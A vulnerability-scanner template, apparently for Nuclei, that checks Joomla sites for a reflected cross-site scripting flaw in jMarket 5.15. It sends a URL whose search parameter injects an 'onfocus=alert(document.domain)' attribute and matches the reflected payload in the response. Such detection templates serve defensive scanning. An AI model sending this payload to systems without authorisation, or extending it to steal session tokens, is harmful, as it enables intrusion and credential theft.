id: joomla-jmarket-xss

info:
  name: Joomla jMarket 5.15 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://packetstormsecurity.com/files/168581/Joomla-jMarket-5.15-Cross-Site-Scripting.html
    - https://cxsecurity.com/issue/WLB-2022100002
    - https://extensions.joomla.org/
  metadata:
    verified: true
    max-request: 1
  tags: packetstorm,xss,packetstrom,joomla,jmarket

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs[x][search]=gx3vt%20onfocus=alert(document.domain)%20autofocus=%20itkrzsug7w5"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "onfocus=alert(document.domain) autofocus=", "catalog-results", "joomla")'
        condition: and

# digest: 490a00463044022049dc0b88e732f1b77fe494e708166feaebbe5f17ae82d172233f0709f0f3989e0220288ff28a48b84a091c2387394fe435702a65890a06218bbaa4d7368eb8bb6278:922c64590222798bb761d5b6d8e72950
